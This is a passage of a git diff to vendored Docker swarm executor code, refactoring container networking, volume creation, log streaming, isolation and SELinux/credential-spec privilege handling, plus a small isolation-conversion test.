libnetwork.ErrNoSuchNetwork: continue default: - log.G(ctx).Errorf("network %s remove failed: %v", nid, err) + log.G(ctx).Errorf("network %s remove failed: %v", name, err) return err } } @@ -174,7 +190,7 @@ func (c *containerAdapter) removeNetworks(ctx context.Context) error { } func (c *containerAdapter) networkAttach(ctx context.Context) error { - config := c.container.createNetworkingConfig() + config := c.container.createNetworkingConfig(c.backend) var ( networkName string @@ -189,11 +205,11 @@ func (c *containerAdapter) networkAttach(ctx context.Context) error { } } - return 
c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config) + return c.backend.UpdateAttachment(networkName, networkID, c.container.networkAttachmentContainerID(), config) } func (c *containerAdapter) waitForDetach(ctx context.Context) error { - config := c.container.createNetworkingConfig() + config := c.container.createNetworkingConfig(c.backend) var ( networkName string @@ -208,26 +224,25 @@ func (c *containerAdapter) waitForDetach(ctx context.Context) error { } } - return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id()) + return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.networkAttachmentContainerID()) } func (c *containerAdapter) create(ctx context.Context) error { var cr containertypes.ContainerCreateCreatedBody var err error - if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{ Name: c.container.name(), Config: c.container.config(), HostConfig: c.container.hostConfig(), // Use the first network in container create - NetworkingConfig: c.container.createNetworkingConfig(), + NetworkingConfig: c.container.createNetworkingConfig(c.backend), }); err != nil { return err } // Docker daemon currently doesn't support multiple networks in container create // Connect to all other networks - nc := c.container.connectNetworkingConfig() + nc := c.container.connectNetworkingConfig(c.backend) if nc != nil { for n, ep := range nc.EndpointsConfig { @@ -239,24 +254,25 @@ func (c *containerAdapter) create(ctx context.Context) error { container := c.container.task.Spec.GetContainer() if container == nil { - return fmt.Errorf("unable to get container from task spec") + return errors.New("unable to get container from task spec") } - // configure secrets - if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil { + if err := c.backend.SetContainerDependencyStore(cr.ID, c.dependencies); err != nil { return err } - refs := 
convert.SecretReferencesFromGRPC(container.Secrets) - if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil { + // configure secrets + secretRefs := convert.SecretReferencesFromGRPC(container.Secrets) + if err := c.backend.SetContainerSecretReferences(cr.ID, secretRefs); err != nil { return err } - if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil { + configRefs := convert.ConfigReferencesFromGRPC(container.Configs) + if err := c.backend.SetContainerConfigReferences(cr.ID, configRefs); err != nil { return err } - return nil + return c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()) } // checkMounts ensures that the provided mounts won't have any host-specific @@ -331,8 +347,8 @@ func (c *containerAdapter) events(ctx context.Context) <-chan events.Message { return eventsq } -func (c *containerAdapter) wait(ctx context.Context) error { - return c.backend.ContainerWaitWithContext(ctx, c.container.nameOrID()) +func (c *containerAdapter) wait(ctx context.Context) (<-chan containerpkg.StateStatus, error) { + return c.backend.ContainerWait(ctx, c.container.nameOrID(), containerpkg.WaitConditionNotRunning) } func (c *containerAdapter) shutdown(ctx context.Context) error { @@ -375,7 +391,10 @@ func (c *containerAdapter) createVolumes(ctx context.Context) error { req := c.container.volumeCreateRequest(&mount) // Check if this volume exists on the engine - if _, err := c.backend.VolumeCreate(req.Name, req.Driver, req.DriverOpts, req.Labels); err != nil { + if _, err := c.volumeBackend.Create(ctx, req.Name, req.Driver, + volumeopts.WithCreateOptions(req.DriverOpts), + volumeopts.WithCreateLabels(req.Labels), + ); err != nil { // TODO(amitshukla): Today, volume create through the engine api does not return an error // when the named volume with the same parameters already exists. 
// It returns an error if the driver name is different - that is a valid error @@ -395,35 +414,33 @@ func (c *containerAdapter) deactivateServiceBinding() error { return c.backend.DeactivateContainerServiceBinding(c.container.name()) } -func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (io.ReadCloser, error) { - reader, writer := io.Pipe() - - apiOptions := &backend.ContainerLogsConfig{ - ContainerLogsOptions: types.ContainerLogsOptions{ - Follow: options.Follow, +func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscriptionOptions) (<-chan *backend.LogMessage, error) { + apiOptions := &types.ContainerLogsOptions{ + Follow: options.Follow, - // TODO(stevvooe): Parse timestamp out of message. This - // absolutely needs to be done before going to production with - // this, at it is completely redundant. - Timestamps: true, - Details: false, // no clue what to do with this, let's just deprecate it. - }, - OutStream: writer, + // Always say yes to Timestamps and Details. we make the decision + // of whether to return these to the user or not way higher up the + // stack. + Timestamps: true, + Details: true, } if options.Since != nil { - since, err := ptypes.Timestamp(options.Since) + since, err := gogotypes.TimestampFromProto(options.Since) if err != nil { return nil, err } - apiOptions.Since = since.Format(time.RFC3339Nano) + // print since as this formatted string because the docker container + // logs interface expects it like this. + // see github.com/docker/docker/api/types/time.ParseTimestamps + apiOptions.Since = fmt.Sprintf("%d.%09d", since.Unix(), int64(since.Nanosecond())) } if options.Tail < 0 { // See protobuf documentation for details of how this works. 
apiOptions.Tail = fmt.Sprint(-options.Tail - 1) } else if options.Tail > 0 { - return nil, fmt.Errorf("tail relative to start of logs not supported via docker API") + return nil, errors.New("tail relative to start of logs not supported via docker API") } if len(options.Streams) == 0 { @@ -439,14 +456,11 @@ func (c *containerAdapter) logs(ctx context.Context, options api.LogSubscription } } } - - chStarted := make(chan struct{}) - go func() { - defer writer.Close() - c.backend.ContainerLogs(ctx, c.container.name(), apiOptions, chStarted) - }() - - return reader, nil + msgs, _, err := c.backend.ContainerLogs(ctx, c.container.name(), apiOptions) + if err != nil { + return nil, err + } + return msgs, nil } // todo: typed/wrapped errors diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go index e0ee81a8b9..f0aa0b9577 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go @@ -1,10 +1,11 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( + "context" + executorpkg "github.com/docker/docker/daemon/cluster/executor" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" - "golang.org/x/net/context" ) // networkAttacherController implements agent.Controller against docker's API. 
@@ -20,8 +21,8 @@ type networkAttacherController struct { closed chan struct{} } -func newNetworkAttacherController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*networkAttacherController, error) { - adapter, err := newContainerAdapter(b, task, secrets) +func newNetworkAttacherController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*networkAttacherController, error) { + adapter, err := newContainerAdapter(b, i, v, task, node, dependencies) if err != nil { return nil, err } @@ -40,11 +41,7 @@ func (nc *networkAttacherController) Update(ctx context.Context, t *api.Task) er func (nc *networkAttacherController) Prepare(ctx context.Context) error { // Make sure all the networks that the task needs are created. - if err := nc.adapter.createNetworks(ctx); err != nil { - return err - } - - return nil + return nc.adapter.createNetworks(ctx) } func (nc *networkAttacherController) Start(ctx context.Context) error { @@ -69,11 +66,7 @@ func (nc *networkAttacherController) Terminate(ctx context.Context) error { func (nc *networkAttacherController) Remove(ctx context.Context) error { // Try removing the network referenced in this task in case this // task is the last one referencing it - if err := nc.adapter.removeNetworks(ctx); err != nil { - return err - } - - return nil + return nc.adapter.removeNetworks(ctx) } func (nc *networkAttacherController) Close() error { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go index f033ad545e..77d21d2c1f 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go @@ -1,4 +1,4 @@ -package container +package container // import 
"github.com/docker/docker/daemon/cluster/executor/container" import ( "errors" @@ -8,8 +8,9 @@ import ( "strings" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" enginecontainer "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" @@ -17,13 +18,16 @@ import ( enginemount "github.com/docker/docker/api/types/mount" "github.com/docker/docker/api/types/network" volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" clustertypes "github.com/docker/docker/daemon/cluster/provider" - "github.com/docker/docker/reference" "github.com/docker/go-connections/nat" + netconst "github.com/docker/libnetwork/datastore" "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/api/genericresource" "github.com/docker/swarmkit/template" + gogotypes "github.com/gogo/protobuf/types" ) const ( @@ -44,12 +48,12 @@ type containerConfig struct { // newContainerConfig returns a validated container config. No methods should // return an error if this function returns without error. 
-func newContainerConfig(t *api.Task) (*containerConfig, error) { +func newContainerConfig(t *api.Task, node *api.NodeDescription) (*containerConfig, error) { var c containerConfig - return &c, c.setTask(t) + return &c, c.setTask(t, node) } -func (c *containerConfig) setTask(t *api.Task) error { +func (c *containerConfig) setTask(t *api.Task, node *api.NodeDescription) error { if t.Spec.GetContainer() == nil && t.Spec.GetAttachment() == nil { return exec.ErrRuntimeUnsupported } @@ -74,7 +78,7 @@ func (c *containerConfig) setTask(t *api.Task) error { c.task = t if t.Spec.GetContainer() != nil { - preparedSpec, err := template.ExpandContainerSpec(t) + preparedSpec, err := template.ExpandContainerSpec(node, t) if err != nil { return err } @@ -86,7 +90,7 @@ func (c *containerConfig) setTask(t *api.Task) error { return nil } -func (c *containerConfig) id() string { +func (c *containerConfig) networkAttachmentContainerID() string { attachment := c.task.Spec.GetAttachment() if attachment == nil { return "" @@ -112,7 +116,7 @@ func (c *containerConfig) nameOrID() string { return c.name() } - return c.id() + return c.networkAttachmentContainerID() } func (c *containerConfig) name() string { @@ -132,11 +136,11 @@ func (c *containerConfig) name() string { func (c *containerConfig) image() string { raw := c.spec().Image - ref, err := reference.ParseNamed(raw) + ref, err := reference.ParseNormalizedNamed(raw) if err != nil { return raw } - return reference.WithDefaultTag(ref).String() + return reference.FamiliarString(reference.TagNameOnly(ref)) } func (c *containerConfig) portBindings() nat.PortMap { @@ -164,6 +168,18 @@ func (c *containerConfig) portBindings() nat.PortMap { return portBindings } +func (c *containerConfig) isolation() enginecontainer.Isolation { + return convert.IsolationFromGRPC(c.spec().Isolation) +} + +func (c *containerConfig) init() *bool { + if c.spec().Init == nil { + return nil + } + init := c.spec().Init.GetValue() + return &init +} + func (c 
*containerConfig) exposedPorts() map[nat.Port]struct{} { exposedPorts := make(map[nat.Port]struct{}) if c.task.Endpoint == nil { @@ -183,12 +199,16 @@ func (c *containerConfig) exposedPorts() map[nat.Port]struct{} { } func (c *containerConfig) config() *enginecontainer.Config { + genericEnvs := genericresource.EnvFormat(c.task.AssignedGenericResources, "DOCKER_RESOURCE") + env := append(c.spec().Env, genericEnvs...) + config := &enginecontainer.Config{ Labels: c.labels(), + StopSignal: c.spec().StopSignal, Tty: c.spec().TTY, OpenStdin: c.spec().OpenStdin, User: c.spec().User, - Env: c.spec().Env, + Env: env, Hostname: c.spec().Hostname, WorkingDir: c.spec().Dir, Image: c.image(), @@ -323,22 +343,27 @@ func (c *containerConfig) healthcheck() *enginecontainer.HealthConfig { if hcSpec == nil { return nil } - interval, _ := ptypes.Duration(hcSpec.Interval) - timeout, _ := ptypes.Duration(hcSpec.Timeout) + interval, _ := gogotypes.DurationFromProto(hcSpec.Interval) + timeout, _ := gogotypes.DurationFromProto(hcSpec.Timeout) + startPeriod, _ := gogotypes.DurationFromProto(hcSpec.StartPeriod) return &enginecontainer.HealthConfig{ - Test: hcSpec.Test, - Interval: interval, - Timeout: timeout, - Retries: int(hcSpec.Retries), + Test: hcSpec.Test, + Interval: interval, + Timeout: timeout, + Retries: int(hcSpec.Retries), + StartPeriod: startPeriod, } } func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { hc := &enginecontainer.HostConfig{ - Resources: c.resources(), - GroupAdd: c.spec().Groups, - PortBindings: c.portBindings(), - Mounts: c.mounts(), + Resources: c.resources(), + GroupAdd: c.spec().Groups, + PortBindings: c.portBindings(), + Mounts: c.mounts(), + ReadonlyRootfs: c.spec().ReadOnly, + Isolation: c.isolation(), + Init: c.init(), } if c.spec().DNSConfig != nil { @@ -347,6 +372,8 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { hc.DNSOptions = c.spec().DNSConfig.Options } + c.applyPrivileges(hc) + // The format of extra hosts 
on swarmkit is specified in: // http://man7.org/linux/man-pages/man5/hosts.5.html // IP_address canonical_hostname [aliases...] @@ -368,11 +395,19 @@ func (c *containerConfig) hostConfig() *enginecontainer.HostConfig { } } + if len(c.task.Networks) > 0 { + labels := c.task.Networks[0].Network.Spec.Annotations.Labels + name := c.task.Networks[0].Network.Spec.Annotations.Name + if v, ok := labels["com.docker.swarm.predefined"]; ok && v == "true" { + hc.NetworkMode = enginecontainer.NetworkMode(name) + } + } + return hc } // This handles the case of volumes that are defined inside a service Mount -func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumesCreateBody { +func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.VolumeCreateBody { var ( driverName string driverOpts map[string]string @@ -386,7 +421,7 @@ func (c *containerConfig) volumeCreateRequest(mount *api.Mount) *volumetypes.Vol } if mount.VolumeOptions != nil { - return &volumetypes.VolumesCreateBody{ + return &volumetypes.VolumeCreateBody{ Name: mount.Source, Driver: driverName, DriverOpts: driverOpts, @@ -422,7 +457,7 @@ func (c *containerConfig) resources() enginecontainer.Resources { } // Docker daemon supports just 1 network during container create. 
-func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { +func (c *containerConfig) createNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig { var networks []*api.NetworkAttachment if c.task.Spec.GetContainer() != nil || c.task.Spec.GetAttachment() != nil { networks = c.task.Networks @@ -430,19 +465,18 @@ func (c *containerConfig) createNetworkingConfig() *network.NetworkingConfig { epConfig := make(map[string]*network.EndpointSettings) if len(networks) > 0 { - epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0]) + epConfig[networks[0].Network.Spec.Annotations.Name] = getEndpointConfig(networks[0], b) } return &network.NetworkingConfig{EndpointsConfig: epConfig} } // TODO: Merge this function with createNetworkingConfig after daemon supports multiple networks in container create -func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { +func (c *containerConfig) connectNetworkingConfig(b executorpkg.Backend) *network.NetworkingConfig { var networks []*api.NetworkAttachment if c.task.Spec.GetContainer() != nil { networks = c.task.Networks } - // First network is used during container create. 
Other networks are used in "docker network connect" if len(networks) < 2 { return nil @@ -450,12 +484,12 @@ func (c *containerConfig) connectNetworkingConfig() *network.NetworkingConfig { epConfig := make(map[string]*network.EndpointSettings) for _, na := range networks[1:] { - epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na) + epConfig[na.Network.Spec.Annotations.Name] = getEndpointConfig(na, b) } return &network.NetworkingConfig{EndpointsConfig: epConfig} } -func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { +func getEndpointConfig(na *api.NetworkAttachment, b executorpkg.Backend) *network.EndpointSettings { var ipv4, ipv6 string for _, addr := range na.Addresses { ip, _, err := net.ParseCIDR(addr) @@ -473,13 +507,20 @@ func getEndpointConfig(na *api.NetworkAttachment) *network.EndpointSettings { } } - return &network.EndpointSettings{ + n := &network.EndpointSettings{ NetworkID: na.Network.ID, IPAMConfig: &network.EndpointIPAMConfig{ IPv4Address: ipv4, IPv6Address: ipv6, }, + DriverOpts: na.DriverAttachmentOpts, + } + if v, ok := na.Network.Spec.Annotations.Labels["com.docker.swarm.predefined"]; ok && v == "true" { + if ln, err := b.FindNetwork(na.Network.Spec.Annotations.Name); err == nil { + n.NetworkID = ln.ID() + } } + return n } func (c *containerConfig) virtualIP(networkID string) string { @@ -543,19 +584,6 @@ func (c *containerConfig) serviceConfig() *clustertypes.ServiceConfig { return svcCfg } -// networks returns a list of network names attached to the container. The -// returned name can be used to lookup the corresponding network create -// options. 
-func (c *containerConfig) networks() []string { - var networks []string - - for name := range c.networksAttachments { - networks = append(networks, name) - } - - return networks -} - func (c *containerConfig) networkCreateRequest(name string) (clustertypes.NetworkCreateRequest, error) { na, ok := c.networksAttachments[name] if !ok { @@ -564,29 +592,83 @@ func (c *containerConfig) networkCreateRequest(name string) (clustertypes.Networ options := types.NetworkCreate{ // ID: na.Network.ID, - Driver: na.Network.DriverState.Name, - IPAM: &network.IPAM{ - Driver: na.Network.IPAM.Driver.Name, - Options: na.Network.IPAM.Driver.Options, - }, - Options: na.Network.DriverState.Options, Labels: na.Network.Spec.Annotations.Labels, Internal: na.Network.Spec.Internal, Attachable: na.Network.Spec.Attachable, + Ingress: convert.IsIngressNetwork(na.Network), EnableIPv6: na.Network.Spec.Ipv6Enabled, CheckDuplicate: true, + Scope: netconst.SwarmScope, } - for _, ic := range na.Network.IPAM.Configs { - c := network.IPAMConfig{ - Subnet: ic.Subnet, - IPRange: ic.Range, - Gateway: ic.Gateway, + if na.Network.Spec.GetNetwork() != "" { + options.ConfigFrom = &network.ConfigReference{ + Network: na.Network.Spec.GetNetwork(), } - options.IPAM.Config = append(options.IPAM.Config, c) } - return clustertypes.NetworkCreateRequest{na.Network.ID, types.NetworkCreateRequest{Name: name, NetworkCreate: options}}, nil + if na.Network.DriverState != nil { + options.Driver = na.Network.DriverState.Name + options.Options = na.Network.DriverState.Options + } + if na.Network.IPAM != nil { + options.IPAM = &network.IPAM{ + Driver: na.Network.IPAM.Driver.Name, + Options: na.Network.IPAM.Driver.Options, + } + for _, ic := range na.Network.IPAM.Configs { + c := network.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + } + options.IPAM.Config = append(options.IPAM.Config, c) + } + } + + return clustertypes.NetworkCreateRequest{ + ID: na.Network.ID, + NetworkCreateRequest: 
types.NetworkCreateRequest{ + Name: name, + NetworkCreate: options, + }, + }, nil +} + +func (c *containerConfig) applyPrivileges(hc *enginecontainer.HostConfig) { + privileges := c.spec().Privileges + if privileges == nil { + return + } + + credentials := privileges.CredentialSpec + if credentials != nil { + switch credentials.Source.(type) { + case *api.Privileges_CredentialSpec_File: + hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=file://"+credentials.GetFile()) + case *api.Privileges_CredentialSpec_Registry: + hc.SecurityOpt = append(hc.SecurityOpt, "credentialspec=registry://"+credentials.GetRegistry()) + } + } + + selinux := privileges.SELinuxContext + if selinux != nil { + if selinux.Disable { + hc.SecurityOpt = append(hc.SecurityOpt, "label=disable") + } + if selinux.User != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=user:"+selinux.User) + } + if selinux.Role != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=role:"+selinux.Role) + } + if selinux.Level != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=level:"+selinux.Level) + } + if selinux.Type != "" { + hc.SecurityOpt = append(hc.SecurityOpt, "label=type:"+selinux.Type) + } + } } func (c containerConfig) eventFilter() filters.Args { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go new file mode 100644 index 0000000000..1bf6f6cf02 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/container_test.go @@ -0,0 +1,37 @@ +package container // import "github.com/docker/docker/daemon/cluster/executor/container" + +import ( + "testing" + + "github.com/docker/docker/api/types/container" + swarmapi "github.com/docker/swarmkit/api" + "gotest.tools/assert" +) + +func TestIsolationConversion(t *testing.T) { + cases := []struct { + name string + from swarmapi.ContainerSpec_Isolation + to container.Isolation + }{ + {name: 
"default", from: swarmapi.ContainerIsolationDefault, to: container.IsolationDefault}, + {name: "process", from: swarmapi.ContainerIsolationProcess, to: container.IsolationProcess}, + {name: "hyperv", from: swarmapi.ContainerIsolationHyperV, to: container.IsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + task := swarmapi.Task{ + Spec: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + }, + } + config := containerConfig{task: &task} + assert.Equal(t, c.to, config.hostConfig().Isolation) + }) + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go index 75f286a217..bcd426e73d 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go @@ -1,11 +1,8 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" import ( - "bufio" - "bytes" - "encoding/binary" + "context" "fmt" - "io" "os" "strconv" "strings" @@ -19,22 +16,22 @@ import ( "github.com/docker/swarmkit/agent/exec" "github.com/docker/swarmkit/api" "github.com/docker/swarmkit/log" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" "github.com/pkg/errors" - "golang.org/x/net/context" "golang.org/x/time/rate" ) +const defaultGossipConvergeDelay = 2 * time.Second + // controller implements agent.Controller against docker's API. // // Most operations against docker's API are done through the container name, // which is unique to the task. 
type controller struct { - task *api.Task - adapter *containerAdapter - closed chan struct{} - err error - + task *api.Task + adapter *containerAdapter + closed chan struct{} + err error pulled chan struct{} // closed after pull cancelPull func() // cancels pull context if not nil pullErr error // pull error, only read after pulled closed @@ -43,8 +40,8 @@ type controller struct { var _ exec.Controller = &controller{} // NewController returns a docker exec runner for the provided task. -func newController(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*controller, error) { - adapter, err := newContainerAdapter(b, task, secrets) +func newController(b executorpkg.Backend, i executorpkg.ImageBackend, v executorpkg.VolumeBackend, task *api.Task, node *api.NodeDescription, dependencies exec.DependencyGetter) (*controller, error) { + adapter, err := newContainerAdapter(b, i, v, task, node, dependencies) if err != nil { return nil, err } @@ -148,7 +145,6 @@ func (r *controller) Prepare(ctx context.Context) error { } } } - if err := r.adapter.create(ctx); err != nil { if isContainerCreateNameConflict(err) { if _, err := r.adapter.inspect(ctx); err != nil { @@ -187,7 +183,7 @@ func (r *controller) Start(ctx context.Context) error { for { if err := r.adapter.start(ctx); err != nil { - if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + if _, ok := errors.Cause(err).(libnetwork.ErrNoSuchNetwork); ok { // Retry network creation again if we // failed because some of the networks // were not found. 
@@ -205,7 +201,7 @@ func (r *controller) Start(ctx context.Context) error { } // no health check - if ctnr.Config == nil || ctnr.Config.Healthcheck == nil { + if ctnr.Config == nil || ctnr.Config.Healthcheck == nil || len(ctnr.Config.Healthcheck.Test) == 0 || ctnr.Config.Healthcheck.Test[0] == "NONE" { if err := r.adapter.activateServiceBinding(); err != nil { log.G(ctx).WithError(err).Errorf("failed to activate service binding for container %s which has no healthcheck config", r.adapter.container.name()) return err @@ -213,12 +209,6 @@ func (r *controller) Start(ctx context.Context) error { return nil } - healthCmd := ctnr.Config.Healthcheck.Test - - if len(healthCmd) == 0 || healthCmd[0] == "NONE" { - return nil - } - // wait for container to be healthy eventq := r.adapter.events(ctx) @@ -287,30 +277,50 @@ func (r *controller) Wait(pctx context.Context) error { } }() - err := r.adapter.wait(ctx) - if ctx.Err() != nil { - return ctx.Err() + waitC, err := r.adapter.wait(ctx) + if err != nil { + return err } - if err != nil { - ee := &exitError{} - if ec, ok := err.(exec.ExitCoder); ok { - ee.code = ec.ExitCode() + if status := <-waitC; status.ExitCode() != 0 { + exitErr := &exitError{ + code: status.ExitCode(), } + + // Set the cause if it is knowable. select { case e := <-healthErr: - ee.cause = e + exitErr.cause = e default: - if err.Error() != "" { - ee.cause = err + if status.Err() != nil { + exitErr.cause = status.Err() } } - return ee + + return exitErr } return nil } +func (r *controller) hasServiceBinding() bool { + if r.task == nil { + return false + } + + // service is attached to a network besides the default bridge + for _, na := range r.task.Networks { + if na.Network == nil || + na.Network.DriverState == nil || + na.Network.DriverState.Name == "bridge" && na.Network.Spec.Annotations.Name == "bridge" { + continue + } + return true + } + + return false +} + // Shutdown the container cleanly. 
func (r *controller) Shutdown(ctx context.Context) error { if err := r.checkClosed(); err != nil { @@ -321,10 +331,18 @@ func (r *controller) Shutdown(ctx context.Context) error { r.cancelPull() } - // remove container from service binding - if err := r.adapter.deactivateServiceBinding(); err != nil { - log.G(ctx).WithError(err).Errorf("failed to deactivate service binding for container %s", r.adapter.container.name()) - return err + if r.hasServiceBinding() { + // remove container from service binding + if err := r.adapter.deactivateServiceBinding(); err != nil { + log.G(ctx).WithError(err).Warningf("failed to deactivate service binding for container %s", r.adapter.container.name()) + // Don't return an error here, because failure to deactivate + // the service binding is expected if the container was never + // started. + } + + // add a delay for gossip converge + // TODO(dongluochen): this delay should be configurable to fit different cluster size and network delay. + time.Sleep(defaultGossipConvergeDelay) } if err := r.adapter.shutdown(ctx); err != nil { @@ -445,15 +463,27 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti return err } - if err := r.waitReady(ctx); err != nil { - return errors.Wrap(err, "container not ready for logs") + // if we're following, wait for this container to be ready. there is a + // problem here: if the container will never be ready (for example, it has + // been totally deleted) then this will wait forever. however, this doesn't + // actually cause any UI issues, and shouldn't be a problem. the stuck wait + // will go away when the follow (context) is canceled. + if options.Follow { + if err := r.waitReady(ctx); err != nil { + return errors.Wrap(err, "container not ready for logs") + } } + // if we're not following, we're not gonna wait for the container to be + // ready. just call logs. if the container isn't ready, the call will fail + // and return an error. 
no big deal, we don't care, we only want the logs + // we can get RIGHT NOW with no follow - rc, err := r.adapter.logs(ctx, options) + logsContext, cancel := context.WithCancel(ctx) + msgs, err := r.adapter.logs(logsContext, options) + defer cancel() if err != nil { return errors.Wrap(err, "failed getting container logs") } - defer rc.Close() var ( // use a rate limiter to keep things under control but also provides some @@ -466,53 +496,48 @@ func (r *controller) Logs(ctx context.Context, publisher exec.LogPublisher, opti } ) - brd := bufio.NewReader(rc) for { - // so, message header is 8 bytes, treat as uint64, pull stream off MSB - var header uint64 - if err := binary.Read(brd, binary.BigEndian, &header); err != nil { - if err == io.EOF { - return nil - } - - return errors.Wrap(err, "failed reading log header") + msg, ok := <-msgs + if !ok { + // we're done here, no more messages + return nil } - stream, size := (header>>(7<<3))&0xFF, header & ^(uint64(0xFF)<<(7<<3)) + if msg.Err != nil { + // the defered cancel closes the adapter's log stream + return msg.Err + } - // limit here to decrease allocation back pressure. - if err := limiter.WaitN(ctx, int(size)); err != nil { + // wait here for the limiter to catch up + if err := limiter.WaitN(ctx, len(msg.Line)); err != nil { return errors.Wrap(err, "failed rate limiter") } - - buf := make([]byte, size) - _, err := io.ReadFull(brd, buf) + tsp, err := gogotypes.TimestampProto(msg.Timestamp) if err != nil { - return errors.Wrap(err, "failed reading buffer") + return errors.Wrap(err, "failed to convert timestamp") } - - // Timestamp is RFC3339Nano with 1 space after. 
Lop, parse, publish - parts := bytes.SplitN(buf, []byte(" "), 2) - if len(parts) != 2 { - return fmt.Errorf("invalid timestamp in log message: %v", buf) + var stream api.LogStream + if msg.Source == "stdout" { + stream = api.LogStreamStdout + } else if msg.Source == "stderr" { + stream = api.LogStreamStderr } - ts, err := time.Parse(time.RFC3339Nano, string(parts[0])) - if err != nil { - return errors.Wrap(err, "failed to parse timestamp") - } - - tsp, err := ptypes.TimestampProto(ts) - if err != nil { - return errors.Wrap(err, "failed to convert timestamp") + // parse the details out of the Attrs map + var attrs []api.LogAttr + if len(msg.Attrs) != 0 { + attrs = make([]api.LogAttr, 0, len(msg.Attrs)) + for _, attr := range msg.Attrs { + attrs = append(attrs, api.LogAttr{Key: attr.Key, Value: attr.Value}) + } } if err := publisher.Publish(ctx, api.LogMessage{ Context: msgctx, Timestamp: tsp, - Stream: api.LogStream(stream), - - Data: parts[1], + Stream: stream, + Attrs: attrs, + Data: msg.Line, }); err != nil { return errors.Wrap(err, "failed to publish log message") } @@ -539,15 +564,8 @@ func (r *controller) matchevent(event events.Message) bool { if event.Type != events.ContainerEventType { return false } - - // TODO(stevvooe): Filter based on ID matching, in addition to name. - - // Make sure the events are for this container. - if event.Actor.Attributes["name"] != r.adapter.container.name() { - return false - } - - return true + // we can't filter using id since it will have huge chances to introduce a deadlock. see #33377. 
+ return event.Actor.Attributes["name"] == r.adapter.container.name() } func (r *controller) checkClosed() error { @@ -603,6 +621,8 @@ func parsePortMap(portMap nat.PortMap) ([]*api.PortConfig, error) { protocol = api.ProtocolTCP case "udp": protocol = api.ProtocolUDP + case "sctp": + protocol = api.ProtocolSCTP default: return nil, fmt.Errorf("invalid protocol: %s", parts[1]) } @@ -641,7 +661,7 @@ func (e *exitError) Error() string { } func (e *exitError) ExitCode() int { - return int(e.code) + return e.code } func (e *exitError) Cause() error { diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go index 63e1233566..4c90b9e0a2 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go @@ -1,15 +1,17 @@ -package container +package container // import "github.com/docker/docker/daemon/cluster/executor/container" -import "fmt" +import ( + "errors" +) var ( // ErrImageRequired returned if a task is missing the image definition. - ErrImageRequired = fmt.Errorf("dockerexec: image required") + ErrImageRequired = 